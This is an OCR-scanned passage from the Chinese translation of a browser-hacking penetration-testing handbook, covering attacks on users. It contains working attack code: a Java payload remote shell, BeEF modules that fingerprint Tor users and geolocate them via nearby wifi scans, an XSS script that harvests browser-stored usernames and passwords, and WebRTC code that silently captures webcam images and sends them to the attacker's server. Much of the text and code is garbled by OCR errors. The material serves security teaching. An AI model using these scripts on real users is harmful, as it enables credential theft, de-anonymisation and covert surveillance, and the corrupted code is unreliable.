起 反 向 连接 。 当 然 ， 你 可 以 选择 任何 你 喜欢 的 远程 访问 工具 Remote Access Tool, RAT ) 4&4 
代 Meterpreter。 在 本 文 写作 时 ， 下 由 于 缺乏 完善 的 “点 击 播放 ”的 机 制 ， 而 成 为 当前 最 容易 被 
攻击 的 浏览 器 。 
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攻击 程序 在 启动 后 ， 目 标 会 主动 连接 你 的 Java 监 听 器 ， 而 如 果 监 听 器 收 到 了 响应 指令 ， 它 
会 在 终端 中 打印 一 个 “!”。 这 时 输入 help 可 以 查看 到 所 有 支持 的 命令 列表 ( 见 图 5-26 )， 比 如 
ls， 它 会 列 出 当前 文件 夹 下 所 有 的 文件 ( 如 图 5-27 所 示 )。 我 们 会 在 第 8 章 中 进一步 探索 远程 代 
码 执行 ， 特 别 是 利用 插件 进行 远程 控制 。 当 然 ， 一旦 你 拿 到 了 如 此 高 的 权限 ， 那 么 就 可 以 “ 胡 
作 非 为 ”了 。 








! help 
help: show information about commands. 
Usage: help [command] 


Supported commands: 
help  - show this help 
info  - list system properties 
pwd - show current directory 
cd - change directory 
ls - list directory 
exec  - execute native command 
cat - show text file 
wget - download file 
telnet - create TCP connection 
paste - create text file 
jobs  - list or continue jobs 
exit  - Exit JSh 





When inside an interactive command, enter ~. on a new 
line to exit from that command. Enter ~& to background the command. 
Enter ~~ to start a line with a ~ character 








图 $-26 Java Payload help 命 令 
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[RooT] 


.dbfseventsd 6 2011-18-83 12:32 
.DocumentRevisions-V188 [DIR] 2013-83-88 14:09 
file 8 2011-86-27 89:31 
-f seventsd [DIR] 2813-84-88 89:51 
-Spotlight-Vi8B8 [DIR] 2811-87-88 17:84 
[DIR] 2811-87-88 17:13 
2011-86-25 14:05 
[DIR] 2813-84-81 22:09 


2812-18-84 11:28 


2011-86-27 89:31 
2813-84-06 17:28 

[DIR] 2613-64-66 17:11 
2013-04-06 17:19 
2013-84-07 16:46 
2812-12-83 26:48 
15572704 2012-88-24 87:27 
2813-84-07 16:46 
2011-86-27 89:31 
2011-89-85 18:56 
2611-67-88 16:37 
2612-16-64 11:28 





图 $-27 Java Payload 1sft 4 


如 果 你 需要 获取 上 文中 模块 的 完整 代码 ,可 以 访问 https://browserhacker.com, 或 Wiley 的 网 站 


www.wiley.com/go/browserhackershandbook。 


Je 
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BeEF 提 供 的 伪造 通知 模块 

BeEF 中 提供 了 大 量 方便 快捷 的 模块 ， 用 于 模仿 下 8、FireFox 和 Chrome 中 的 通知 栏 。Fake 
Notification Bar (IE) 模 块 用 法 十 分 简单 ,， 只 需要 攻击 者 指定 通知 文本 即 可 。 通知 栏 效果 如 图 5-28 
所 示 。 





© OO {geeEF- The Browser Explo x 





€ > E [ beefproject.com xg 





@ We apologize, but due to changes in our website configuration you may receive an applet warning dialog, this is expected 
and should be accepted 





=eEF 


THE BROWSER EXPLOITATION FRAMEWORK PROJECT 


GitHub J Source Control 图 Bug Reporting [EQ Blog 图 wu EQ Twiter Youtube Œ 


What is BeEF? IUD - A 
4 Cj 192.168.175.1 Details | Logs 

BeEF is short for The Browser Exploitation Framework. It is a KC 192.166.1751 4 C3 browser (6) 
penetration testing tool that focuses on the web browser. = Offline Browsers browser 
detect vie 
[Amid growing concerns about web-borne attacks against and 
lients, including mobile clients, BeEF allows the professional @ site redin 
penetaton tester to assess the actual security posture of a © site rodin 
arget environment by using client-side attack vectors. Unlike vic fio on 

pther security frameworks, BeEF looks past the hardened Sites o» 

hetwork perimeter and client system, and examines VR 
xploitability within the context of the one open door: the web © physical 
poe BeEF will hook one or more web browsers and use 4 C metasploit ( 
hem as beachheads for launching directed command La a L 


[ and further attacks against the system from within 
he browser context. 











图 5-28 ”BeEF 的 伪造 正 通知 栏 模块 





SASH AIA HT LA SU, 利用 用 户 信任 进行 攻击 的 方法 数不胜数 。 但 事实 上 , 任何 一 种 攻击 
手法 都 无 法 保证 在 各 种 情况 下 均 有 效 。 我 们 还 从 本 节 中 了 解 到 ,上述 技术 中 有 很 多 已 经 超越 了 纯 
粹 社会 工程 学 的 范畴 。 事 实 上 ,其 中 的 许多 例子 都 通过 分 层 的 方法 实现 ,攻击 者 会 在 使 用 一 定 社 


会 工程 学 知识 的 同时 ， 进 一 步 利 用 浏览 器 及 其 扩展 的 技术 知识 完成 完美 的 攻击 。 


5.4 隐私 攻击 


在 浏览 器 刚刚 兴起 时 ， 大 部 分 人 都 还 没有 保护 隐私 的 意识 。 但 随 着 时 间 的 推移 ， 各 类 Web 应 
用 (尤其 是 那些 可 能 涉及 个 人 信息 的 应 用 ) 日 渐 普 及 ， 隐 私 问 题 也 逐渐 受到 人 们 的 重视 。 现 代 浏 
览 器 大 多 非常 重视 保护 用 户 隐私 ,有 些 甚 至 提供 了 无 痕 浏 览 模式 。 在 无 痕 模式 下 ， 当 一 个 页 面 关 
闭 后 ， 浏 览 器 会 将 与 之 相关 的 临时 文件 、cookie 以 及 历史 记录 等 全 部 删除 。 许 多 浏览 器 都 提供 了 
此 类 功能 ， 只 是 名 字 略 有 不 同 : 
口 Chrome 的 匿名 浏览 模式 〈Incognito mode ) 
口 了 的 隐身 浏览 模式 (InPrivate browsing ) 
口 Opera 的 隐私 页 签 或 隐私 窗口 (Private tab/Private window ) 
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口 Firefox 的 无 痕 浏 览 (Private browsing ) 
O Safarifff] JGJB DU] V, 

为 了 便于 区 分 ,浏览 器 的 无 痕 模 式 与 普通 模式 通常 会 有 一 些 界面 上 的 差异 。 图 5-29 展 示 了 
Chrome 的 匿名 浏览 模式 与 普通 模式 的 差异 。 























s BeEF - The Browser Explo X 






€ > Q D wwwbeefproject.com —— 





-eEF 


THE BROWSER EXPLOITATION FRAMEWORK PROJECT 















图 GitHub 回 source Contro! [EJ Bug Reporting Boo 图 wu (B Twiter YouTube 


What is BeEF? 


wes is short for The Browser Exploitation Framework. It is a 
enetration testing tool that focuses on the web browser. 


mid growing concerns about web-borne attacks against 
blients, including mobile clients, BeEF allows the professional 
penetration tester to assess the actual security posture of a 
arget environment by using client-side attack vectors. Unlike 
bther security frameworks, BeEF looks past the hardened 
hetwork perimeter and client system, and examines 
xploitability within the context of the one open door: the web 








图 $-29 Chrome 的 匿名 浏览 模式 





截至 本 书 成 文 时 ， 尚 不 存在 探究 浏览 器 是 否 处 于 无 痕 模 式 的 方法 。Jeremiah Grossman” ffl 
Collin Jackson2" 曾 做 过 一 些 研 究 : 对 于 某 些 旧版 本 浏览 器 ， 比 如 Firefox 的 1.5 或 2.0 版 本 ， 可 以 通过 
JavaScripth get Comput edSty1e Ph AEF rou] Va. 是 否 处 于 无 痕 模 式 (参见 4.3.3 节 )。 

由 于 服务 器 知晓 一 个 请 求 的 来 源 卫 地址 , 所 以 它 可 以 由 此 查询 出 客户 端的 地 理 位 置 ， 虽 然 此 
位 置 无 法 做 到 十 分 详细 且 精 确 ， 但 至 少 能 确定 客户 端 所 在 的 国家 。 
但 这 也 并 不 能 说 明 用 户 的 隐私 不 被 重视 。 例 如 ， 有 一 个 名 叫 电子 前 哨 基 金 会 Electronic 
Frontier Foundation, EFF ) 的 组 织 ， 就 一 直 奔 走 在 捍卫 人 们 的 隐私 权 、 言 论 自 由 和 其 他 消费 者 权 
利 的 第 一 线 。 此 外 还 有 被 称 为 “洋葱 路 由 需 ”( The Onion Router ) 的 Tor 项 目 ， 旨 在 协助 保护 用 户 
EZER, 

在 本 节 的 后 续 部 分 中 ， 我 们 将 更 详细 地 探索 Tor 网 络 ， 以 及 其 他 一 些 可 以 用 来 打破 浏览 器 密 
保 机 制 的 小 技巧 。 


5.4.1 不 基于 cookie 的 会 话 追 踪 


本 节 将 会 介绍 一 种 在 用 户 上 网 时 对 他 们 保持 追踪 的 方法 , 尽管 其 内 容 可 能 不 如 控制 小 白 用 户 
的 摄像 头 那么 有 趣 ， 但 是 会 非常 有 用 。 第 4 章 中 学 习 过 关于 浏览 器 历史 的 内 容 ， 可 以 再 翻 回去 看 
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一 下 ， 作 为 本 节 中 关于 信息 泄漏 的 内 容 的 背景 知识 。 

人 们 通常 讨论 的 浏览 器 会 话 追踪 多 是 基于 cookie 技 术 展开 的 。 关 于 cookie， 我 们 会 在 6.2 节 中 
进行 详细 的 介绍 

但 是 ， 如 果 用 户 清除 了 cookie 或 者 对 特定 网 站 禁用 了 cookie 呢 ? 在 这 种 情况 下 ， 仅 靠 cookie 
已 经 无 法 实现 在 多 个 网 站 或 多 次 浏览 中 追踪 用 户 了 。 

为 了 创造 一 种 坚不可摧 的 cookie，Samy Kamkar ( 第 2 章 中 提 到 过 的 臭名 昭著 的 Samy 蜂 虫 病 
毒 的 作者 ) 开发 了 Evercookie 项 目 ， 主 页 为 http://samy.pl/evercookie/。 o 用 多 管 齐 下 的 
方法 ， 以 实现 对 可 检索 会 话 标识 符 的 持久 化 存储 。 与 其 他 技术 仅 依赖 HTTP 的 cookie 不 同 ， 
Evercookie 依 赖 很 多 其 他 构件 ， 其 中 包括 : 

口 本 地 共享 对 象 或 Flash cookie 
口 Silverlight 存 储 

口 正中 的 userData 存 储 

口 HIMLS 存 储 

为 了 能 进一步 识别 回访 的 用 户 , BeEF 在 自己 的 JavaScript 会 话 库 中 也 引用 了 Evercookie 库 。 可 
以 从 BeEF 的 get_hook_session_igd() 函数 看 出 ,该 函数 查询 三 种 不 同 的 Evercookie 构 件 : 
cookie, 、userData 和 window 数 据 。 


// 先 创建 evercookie 对 象 
ec: new evercookie(), 

















get_hook_session_id: function() { 
// 检查 框架 是 否 已 经 涵盖 该 浏览 器 
var id = this.ec.evercookie cookie("BEEFHOOK"); 
if (typeof id == 'undefined') { 
var id - this.ec.evercookie userdata("BEEFHOOK"); 
} 
if (typeof id == 'undefined') { 
var id = this.ec.evercookie_window("BEEFHOOK") ; 


} 


// 如 果 已 经 涵盖 ， 则 创建 匀 连 会 话 ID 

if ((typeof id == 'undefined') | 
id = this.gen_hook_session_id(); 
this.set_hook_session_id(id); 


} 


(id == null)) { 


// 返回 会 话 ID 
return id; 


} 
需要 提醒 你 的 是 ， 用 户 浏 览 任 何 网 站 都 会 留 下 足迹 ， 只 是 有 些 无 法 直接 加 以 利用 而 已 。 


5.4.2” 绕 过 匿名 机 制 
作为 一 个 攻击 者 ， 我 们 有 必要 了 解 自己 已 侵入 的 浏览 器 是 否 使 用 了 Tor 等 工具 以 达到 匿名 隐 
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身 等 目的 ， 但 我 们 要 如 何 确认 呢 ? 

Tor 网 络 的 一 个 有 趣 的 特性 是 可 以 为 处 在 其 中 的 任何 人 提供 匿名 服务 。 它 使 用 匿名 服务 协议 
( Hidden Service Protocol )， 有 效 地 实现 了 服务 端 匿 名 ， 而 非 普 通 的 客户 端 匿名 。 关 于 该 协议 工作 
原理 的 技术 性 细节 不 在 本 书 中 展开 讨论 ， 如 果 你 想 了 解 更 多 ， 可 以 访问 https:/www.torproject.org/ 
docs/hidden-services.html.en 。 

由 于 这 些 匿名 服务 只 能 在 Tor 网 络 内 使 用 ， 所 以 便 有 了 一 种 方法 可 以 检测 色 连 浏览 器 是 否 在 
使 用 Tor。DeepSearch ( http://xycpusearchon2mc.onion ) 是 一 个 只 能 在 Tor 网 络 内 使 用 的 搜索 索引 , 
其 中 .onion 是 一 种 用 于 指定 Tor 匿 名 服务 的 伪 顶 级 域名 。 即 便 它 看 上 去 与 正常 的 顶级 域名 无 异 , 但 
事实 上 并 不 是 这 样 ， 而 且 它 只 能 在 通过 适当 配置 的 本 地 代理 连接 到 Tor 网 络 时 才能 访问 。 
DeepSearch 页面 中 包含 一 个 头 部 logo (http://xycpusearchon2mc.onion/deeplogo.jpg )， 如 果 通 过 浏 
览 器 可 以 访问 logo， 则 表明 浏览 器 正在 Tor 网 络 中 。 

通过 执行 以 下 JavaScript 代 码 ，BeEF 的 Detect Tor 模 块 实现 了 对 Tor 用 途 的 探测 : 


var img = new Image(); 
img.setAttribute("style", "visibility:hidden") ; 
img.setAttribute("width","0"); 
img.setAttribute("height","0"); 
























































img.src = '«$- @tor_resource %>'; 
img.id = 'torimg'; 
img.setAttribute("attr","start"); 
img.onerror - function() ( 


this.setAttribute("attr","error"); 
un 
img.onload function() ( 

this.setAttribute("attr","load"); 





Le 


document .body.appendChild(img) ; 





setTimeout (function() { 
var img = document.getElementById('torimg'); 
if (img.getAttribute("attr") == "error") { 


beef.net.send('<%= @command_url %>', 
<%= @command_id %>, 
'result-Browser is not behind Tor'); 
) else if (img.getAttribute("attr") == "load") { 
beef.net.send('«$- Gcommand url %>', 
<%= QGcommand id %>, 
'result-Browser is behind Tor' 
) else if (img.getAttribute("attr" 
beef.net.send('«$- Gcommand url 
<%= Qcommand id %>, 
'result-Browser timed out. \ 
Cannot determine if browser is behind Tor'); 





JR 
document.body.removeChild(img); 
}, <%= @timeout $$»); 
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代码 的 第 一 部 分 创建 了 一 个 指向 DeepSearch 图 标的 图 像 标 签 ， 该 标签 的 URL 引 用 了 @tor_ 
resource 变 量 。 我 们 需要 向 图 像 设 置 两 个 事件 监听 器 : 一 个 用 于 监听 加 载 成 功 ， 另 一 个 用 于 监 
听 加 载 失 败 。 最 后 ， 需 要 将 该 图 像 附 加 到 文档 的 正文 中 ， 以 便 向 DeepSearch 服 务 器 发 起 请 求 。 

setTimeout () 函数 用 来 在 预定 时 间 后 检查 图 像 的 状态 。etimeout 的 默认 值 为 10000, 即 10 
秒 。 当 计时 结束 时 , 它 会 检查 图 像 是 否 成 功 加 载 。 如 果 可 以 成 功 加 载 , 则 说 明 该 浏览 器 正 处 于 Tor 
网 络 中 。 

如 果 确 认 目 标 浏览 器 使 用 了 Tot 或 其 他 匿名 代理 ,那么 我 们 需要 尝试 获取 用 户 的 实际 JP 地址 ， 
以 便 进一步 刺探 出 更 多 的 隐私 信息 。 下 面 提 供 几 种 实现 方案 。 

第 一 种 方法 是 强制 浏览 器 向 你 所 控制 的 DNS 服 务 器 发 起 DNS 请 求 。 若 浏览 器 仅 设 置 网 络 流量 
使 用 Tor 人 代理， 而 DNS 请 求 不 使 用 ， 那 么 你 将 有 可 能 获取 到 一 些 有 价值 的 信息 。 具 体 的 方法 很 简 
单 ， 与 前 例 类 似 ， 只 需要 在 DOM 中 添加 一 个 image 对 象 ,并 将 image 的 URL 设 为 由 你 控制 的 DNS 
负责 解析 的 域名 下 的 任意 网 址 。 

第 二 种 帮 你 确定 了 地 址 的 方法 ,需要 借助 于 Java 小 程序 或 者 Flash 文 件 。 如 果 目 标 计算 机 中 的 
Flash 或 者 Java 未 配置 使 用 Tor 代 理 ， 那 么 只 需 设 法 通过 它们 访问 攻击 者 控制 的 服务 器 上 的 特殊 
片 或 其 他 文件 ， 便 可 以 获取 到 目标 的 真实 IP。 

此 外 , 还 可 以 使 用 BeEF 提 供 的 Get Physical Location 模 块 来 绕 过 匿名 。 这 个 由 Keith Lee 开 发 的 
模块 在 探测 目标 的 源 IP 的 基础 上 更 进一步 。 它 通过 使 用 封装 在 经 过 签名 的 Java 小 程序 中 的 命令 ， 
对 相 邻 无 线 接 入 点 进行 探测 , 并 基于 此 信息 返回 用 户 的 地 理 信 息 。 如 果 目 标 用 户 正在 使 用 微软 的 
Windows 操 作 系 统 ， 那 么 小 程序 会 运行 如 下 命令 行 去 探测 附近 所 有 的 无 线 网 络 : 

netsh wlan show networks mode=bssid 


如 有 果 目 标 用 户 使 用 的 是 OS X 操 作 系统 ， 则 命令 为 : 


/System/Library/PrivateFrameworks/Apple80211.\ 
framework/Versions/Current/Resources/airport scan 


小 程序 代码 会 解析 上 述 命 令 的 运行 结果 ,并 从 中 分 析出 SSID、BSSID 以 及 信号 强度 ,接着 将 
这 些 信息 通过 Google Maps API 进 行 查询 : https://maps.googleapis.com/maps/api/browserlocation/ 
json?browser=firefox&sensor=true。 能 探测 到 的 无 线 网 络 越 多 ,我 们 确定 的 用 户 地 理 位 置 就 越 精 准 。 
可 能 的 话 ，Google Maps API 返 回 的 信息 ， 除 了 街道 地 址 信息 外 ， 还 包括 GPS 坐标 。 

通过 这 种 方法 ,一 旦 目标 允许 已 签名 的 Java 小 程序 运行 ， 那 么 即使 浏览 器 在 Tor 或 其 他 代理 的 
保护 下 ， 它 仍然 可 以 被 准确 地 定位 。Kyle Wilhoit 就 曾 在 2013 年 使 用 过 这 种 攻击 方法 ， 成 功 地 定位 
了 一 些 打算 攻击 工业 控制 系统 ( Industrial Control Systems, ICS) 的 攻击 者 的 详细 坐标 ”"。 在 2013 
年 美国 BlackHat 大 会 上 , 他 揭示 了 一 些 追 踪 攻 击 者 的 技术 细节 , 其 中 涉及 将 BeEF 和 ICS 蜜 饶 结 合 使 
用 ， 以 便 勾 连 攻 击 者 ， 继 而 将 Detect Tor 和 Get Physical Location R HAEA AEN AA o 


5.4.3 ”攻击 密码 管理 器 
密码 管理 器 软件 能 够 帮助 用 户 存储 和 找 回 密码 。 密 码 管理 器 ( 第 7 章 也 会 进行 讨论 ) 常 被 作 
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为 原生 特性 集成 在 浏览 器 中 , 但 也 有 一 些 是 独立 的 应 用 程序 。 但 很 不 幸 , 在 很 多 情况 下 这 些 工 具 
可 能 会 出 卖 你 。 许多 网 站 会 在 迭代 过 程 中 逐步 增加 安全 特性 , 其 中 防止 密码 管理 期 滥用 的 一 种 主 
要 方法 是 : 对 于 要 提交 的 表单 中 的 密码 框 输入 添加 autocomplete="off" 标 记 ， 以 阻止 浏览 
缓存 该 字段 。 

Ben Towes 曾 做 过 一 些 使 用 XSS 攻 击 密码 管理 器 的 研究 ”,， 成 果 是 一 套 不 错 的 框架 , 用 ace 
PRLE ur SE BL Vids I Ba A AE XSS Tila , BIE J 87 EAR 
autocomplete 标 记 ， 通 过 使 用 JavaScript 库 ， 之 前 存储 过 的 用 户 和 凭据 依旧 有 可 能 会 泄露 。 
使 用 此 方案 的 前 提 是 ， 首 先 需 要 从 试图 窃取 密码 的 源 中 找到 一 个 XSS 漏 洞 。 接 下 来 你 需要 猜 
出 用 户 名 和 密码 的 字段 名 。 拿 到 这 些 信息 后 , 剩 下 的 事情 就 非常 简单 了 : 使 用 JavaScript 创 建 一 个 
表单 ， 稍 作 等 待 后 浏览 器 会 自动 填充 该 表单 ， 最 后 便 可 以 把 这 些 数据 发 回 服务 器 。 

为 了 执行 起 来 更 方便 ，Towes 把 此 逻辑 封装 成 了 一 个 外 部 JavaScript 文 件 ， 并 集成 到 XSS 攻 击 
的 工具 中 。 在 下 面 的 示例 代码 中 ，JavaScript 库 会 检查 用 户 名 字段 的 三 种 可 能 : user, username 
和 un。 密 码 字段 的 三 种 可 能 : pass. passwordfllpw. 
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function getCreds() { 





var users = new Array('user','username','un'); 
var pass = new Array('pass','password','pw'); 
un = pw = ""; 
for( var i = 0; i < users.length; i++) 
{ 

if (document.getElementById(users[i])) { 


un += document.getElementById(users[i]).value; 
j 
j 


for( var i = 0; i « pass.length; i++) 
{ 
if (document.getElementById(pass[i])) { 
pw += document.getElementById(pass[i]).value; 


} 


j 

alert(un + "|" + pw); 
document.getElementById('myform').style.visibility-'hidden'; 
window.clearInterval (check); 


) 


document.write(" «div id-'myform'» «form » «input type-'text' name-'user'"); 
document.write(" id='user' value-'' autocomplete-'on' size-1» «input "); 
document.write("type-'text' name-'username' id-'username' value-'' "); 
document.write("autocomplete-'on' size-1» «input type-'text' name-'un'"); 
document.write(" id-'un' value-'' autocomplete-'on' size-1» «input type-"); 
document.write("'password' name-'pass' id-'pass' value='' autocomplete-'on'"); 
document.write("»«br» «input type-'password' name-'password' id='password' "); 
document.write("value-'' autocomplete-'on'»«br» «input type-'password' "); 
document.write("name-'pw' id-'pw' value-'' autocomplete-'on'»«br» «/form»"); 
document .write("</div>"); 








check = window.setInterval("getCreds()",100); 
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在 这 个 例子 中 ， 你 需要 借助 XSS 漏 洞 ， 在 页 面 中 使 用 脚本 标签 加 载 该 JavaSeript 文 件 。 这 段 代 
码 会 在 <aiv> 标 签 中 创建 一 个 表单 ， 接 着 创建 一 个 定时 器 用 于 循环 调用 getcreas () 函数 。 完 成 
后 ， 浏 览 器 会 弹出 一 个 带 有 用 户 名 和 密码 的 提示 框 ， 如 图 5-30 所 示 。 











人 @ browservictim.com/broken /index.html?locate- «script src%3 7 ip | EJ Google ) | | fi 


admin|Passw0rd123 


NCC IN 





图 5-30 ”获取 到 之 前 缓存 的 用 户 凭据 


在 展示 了 数据 后 ,表单 会 自动 隐藏。 在 真实 的 情境 中 ,你 可 能 会 使 用 一 个 XMLHt tpRequest 
POST 请 求 ， 将 表单 输入 字段 提交 回 服务 器 。 这 个 例子 在 Chrome 和 Firefox 中 都 可 以 正常 工作 ， 但 
在 正中 却 不 行 ， 这 是 因为 正 自动 保存 表单 的 粒度 是 页 面 CURL ) 而 不 是 网 站 域名 )。 

Brendan Coles 在 BeEF 中 创建 的 模块 Get Stored Credentials, 使 用 类 似 的 逻辑 , M EJ ER Firefox 
浏览 器 中 获取 用 户 名 及 密码 信息 。 该 模块 在 隐藏 的 IFrame 中 裔 历 密码 表单 中 的 字段 ,然后 将 整个 
表单 发 送 回 BeEF 服 务 器 。 


5.4.4 ”控制 摄像 头 和 麦克 风 


除了 物理 位 置 外 ， 浏 览 器 还 可 能 会 透露 你 的 其 他 敏感 信息 。 目 前 的 电脑 多 数 都 配 有 麦克 风 ， 
有 些 甚至 配 有 摄像 头 。 随 着 技术 的 发 展 , 这 些 设备 的 价格 逐渐 降低 ,更 多 的 笔记 本 制造 商 希 望 通 
过 添加 此 类 设备 ， 提 升 用 户 的 在 先 沟 通体 验 ， 这 些 设备 逐渐 也 变 为 了 新 一 代笔 记 本 的 标 配 。 

BeEF 提 供 了 两 个 通过 Flash 与 攻击 目标 的 摄像 头 进行 交互 的 实验 模块 。 第 一 个 是 Webcam 
Permission Check 模 块 (由 Ben Waugh 开 发 ): 该 模块 可 以 透明 地 检查 浏 ane eae 
访问 摄像 头 或 麦克 风 。 第 二 个 是 Webcam 模 块 : 该 模块 会 尝试 激活 摄像 头 并 拍 一 些 照片 。 这 两 个 
模块 均 被 封装 在 SWF 文 件 中 ， 通 过 JavaScript 函 数 与 浏览 器 DOM 进 行 交 互 。 为 了 便于 加 载 SWF 文 
件 ，BeEF 还 会 提前 载 人 swfobjectjs 文 件 ， 其 中 包含 swfobject .embedsWF () 函数 。 

在 使 用 Webcam Permission Check 模 块 时 ， 需 要 在 加 载 SWF 文 件 之 前 定义 几 个 JavaScript 全 局 
函数 : 


口 noPermissions 


























口 yesPermissions 
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D naPermissions 


此 外 还 需要 预先 定义 一 个 函数 作为 swfobject .embedswF () 的 回调 函数 。 在 下 面 的 例子 中 ， 
J] JA] PRI BA swobj ectCallback: 


var swfobjectCallback = function(e) { 
if(e.success) { 
beef.net.send("<%= @command_url $»", 
<%= @command_id %>, 
"result=Swfobject successfully added flash object \ 
to the victim page"); 
} else ( 
beef.net.send("«$- @command_url $»", 
<%= Qcommand id %>, 
"result=Swfobject was not able to add the swf file \ 
to the page. This could mean there was no flash \ 
plugin installed."); 





函数 负责 向 BeEF 服 务 器 上 报 SWF 文 件 是 否 成 功 加 载 。swfobjectjs 文 件 需 要 在 调用 
swfobject.embedswr () 函数 前 正确 加 载 到 DOM 中 。 此 逻辑 可 以 借助 jQuery 的 getSscript O PR 
数 来 实现 ， 即 首先 加 载 远 程 脚本 ， 在 加 载 完成 后 调用 函数 。 使 用 此 函数 可 以 优化 对 swfobject. 
embedswr () 的 调用 ， 代 码 片 段 如 下 : 


$j.getScript (beef.net.httpproto+'://'+beef.net.host+ 
':'+beef.net.port+'/swfobject.js', 
function(data,txtStatus,jqxhr) { 
var flashvars = {}; 
var parameters = {}; 
parameters.scale = "noscale"; 
parameters.wmode = "opaque"; 
parameters.allowFullScreen = "true"; 
parameters.allowScriptAccess = "always"; 
var attributes = {}; 
swfobject.embedSWF( 
beef.net.httpproto+'://'+beef.net.host+ 
':'+beef.net.port+'/cameraCheck.swf', 
"main", "1", "1", "9", "expressInstall.swf", 
flashvars, parameters, attributes, swfobjectCallback 











TFASWFE SU BE tx ADOM, ifíj/eicameraCheck.swf7T 63511, cameraCheck.swf X f/f AR 
查 Web 摄 像 头 的 可 用 性 , 然后 根据 结果 调用 不 同 的 全 局 函数 。 如 果 摄 像 头 对 某 一 特定 网 站 可 用 ( 如 
15-31), WlcameraCheck.swf2 J] H]JavaScriptHJyesPermissionsPRZK. 














3 


188 


5 


攻击 用 户 


地 





| Show All 


Flash Player 


Camera and Microphone Settings by Site 

Previously visited websites that have asked to use the camera or microphone are listed 
below. You can allow or block the use of the camera and microphone by specific sites. 
Remove a site to delete all settings and data for that site in Flash Player. 


Website Camera and Mic Access | 


127.0.0.1 Q Ask me 


n 
J 

| 

browserhacker.com $ Allow | 














图 5-31 OS X 中 Flash 关 于 摄像 头 和 麦克 风 的 设置 








BeEF 的 Webcam 模 块 也 使 用 类 似 的 方法 加 载 takeit.swf 文 件 。 当 该 Flash 文 件 在 浏览 器 中 运行 
时 ， 它 会 尝试 截取 几 帧 摄像 头 的 画面 。 与 上 文 提 到 的 摄像 头 访问 限制 类 似 , 运行 此 模式 同样 会 询 
问 用 户 是 否 人 允许 启用 摄像 头 ， 如 图 $-32 所 示 。 

















为 了 尽量 避免 该 提示 的 出 现 , 你 可 以 收集 一 些 关 于 目标 的 信息 ， 
的 网 页 。 如 果 其 中 一 些 网 页 使 用 了 内 容 分 发 网 络 ( Content Delivery Networks, CDN ), | 
要 求 用 户 提供 摄像 头 或 麦克 风 许 可 ,那么 此 用 户 的 浏览 器 很 可 能 ) 
我 们 可 以 尝试 使 用 CDN 或 类 似 的 源 ， 而 不 是 随机 的 源 ， 来 加 载 恶 意 Falsh 文 件 。 当 然 ， 别 忘 了 ， 
我 们 还 可 以 用 第 2 章 “ARP 欺 骗 ” 中 介绍 过 的 ARP 伪 造 技 术 ， 将 该 内 容 添加 到 源 中 。 

尽管 Flash 提 供 了 非常 强大 的 功能 , 但 你 可 能 还 有 疑问 :“ 我 1 


























在 不 使 用 Flash 的 同时 实现 这 些 功能 吗 ?” ”答案 简单 明确 :“ 可 以 吓 

网 页 实时 通信 ( Web Real-Time Communication, WebRTC ) 是 由 W3C 提 出 的 、 跨 浏览 器 的 实 
时 通信 标准 ”。Chrome 版 本 23 以 上 和 Firefox 版 本 22 以 上 均 支 持 WebRTC。 如 果 和 希望 在 HTML5 页 面 
中 使 用 摄像 头 ， 可 以 参考 navigator .getUserMedia 函 数 。 在 本 书写 作 时 ， 此 部 分 的 一 些 特 性 
还 处 在 试验 阶段 ， 未 来 可 能 会 有 所 调整 。 





MediaStream AP 是 WebRTC 的 一 部 分 ， 被 用 于 描述 和 控 








许 尝试 整理 出 他 们 经 党 浏览 





日 该 网 站 


壬 CDN 域 名 加 入 了 白 名 单 。 那 么 ， 


门 常 听 到 的 HTML5 怎 么 样 ? 它 能 


别 浏 览 絮 内 的 音频 或 视频 数据 流 。 


该 API 的 核心 就 是 MediaStream 对 象 自身 ,这 个 URL 字 符 串 指向 存储 在 DOM 文 件 或 者 blob 对 象 中 的 





数据 。 将 它们 3 


里 装 在 一 起 需要 用 到 一 些 DOM 元 素 ,， 例如 <video> 和 <canvas>。 
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eoo BeEF - The Browser Exploitation Framewo! 


@ BeEF - The Browser Exploitatio... 


(d)r][dbeepoeccom | 
ES 


9 
127.0.0.1 is requesting access to 
camera and microphone. If you chek Allow, 
you may be recor 








图 $-32 Flash 权限 对 话 框 


下 面 的 代码 展示 了 如 何 将 必要 的 元 素 以 及 相关 联 的 MediaStream 对 象 添加 到 <video> 元 素 
随后 生成 一 张 截图 并 保存 到 <canvas> 元 素 中 ， 最 后 将 编码 后 的 数据 URI 传 回 服务 器 : 


// 创建 Video 元 素 

var video element = document.createElement ("video"); 
video_element.id = "vid_id"; 

video_element.style = "display:none;"; 
video_element.autoplay = "true"; 





// 创建 canvas 元 素 





var canvas_element = document.createElement ("canvas") ; 
canvas_element.id ="can_id"; 

canvas_element.style = "display:none;"; 
canvas_element.width = "640"; 

canvas_element.height = "480"; 

// 添加 元 素 


document.body.appendChild(video element); 
document.body.appendChild(canvas, element); 


// 返回 绘制 上 下 文 

// 2D@REFR 

// 不 要 WebGL 上 下 文 (3D) 

var ctx = canvas, element.getContext('2d'); 
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// 定义 值 为 hull 的 变量 
var localMediaStream = null; 


// 媒体 流 设置 完毕 后 调用 这 个 函数 
var captureimage = function() { 
// 检查 流 不 为 空 
if (localMediaStream) { 
// 把 video 元 素 中 的 元 素 绘 制 到 canvas, 沿 左上 角 (0,0) 对 象 
ctx.drawImage (video_element,0,0); 


// 把 包含 编码 了 图 片 的 dataURL 发 送 给 攻击 者 
beef.net.send("<%= @command_url %>", 
<%= @command_id %>, 
'image='+canvas_element.toDataURL('image/png')); 
} else { 
// 出 错 的 情况 
beef.net.send("<%= @command_url %>", 
<%= @command_id %>, 
'result-something went wrong'); 





} 


// 保证 拿 到 正确 的 window.URL 对 象 
window.URL = window.URL || window.webkitURL; 


// f&it$ 2) EAM getUserMediak & 

navigator.getUserMedia = navigator.getUserMedia || 
navigator.webkitGetUserMedia || 
navigator.mozGetUserMedia || 
navigator.msGetUserMedia; 


// 确认 取得 相机 使 用 权 
// 然后 调用 function(stream) 函数 
navigator.getUserMedia({video:true},function(stream) { 


// set the video element to the URL representation of 
// the media stream 
video element.src = window.URL.createObjectURL (stream); 


// 复制 流 〈 在 captureimage 函 数 中 检查 ) 
localMediaStream = stream; 


// 2 秒 后 执行 captureimage 
setTimeout (captureimage, 2000); 


}, function(err) { 
// 无 法 取得 流 
beef.net.send("<%= @command_url %>", 
<%= @command_id %>, 
'result-getUserMedia call failed'); 
3): 


该 代码 执行 后 的 结果 是 将 图 片 以 aata:URI 的 形式 传 回 给 你 。 与 本 章 介 绍 的 许多 其 他 攻击 类 
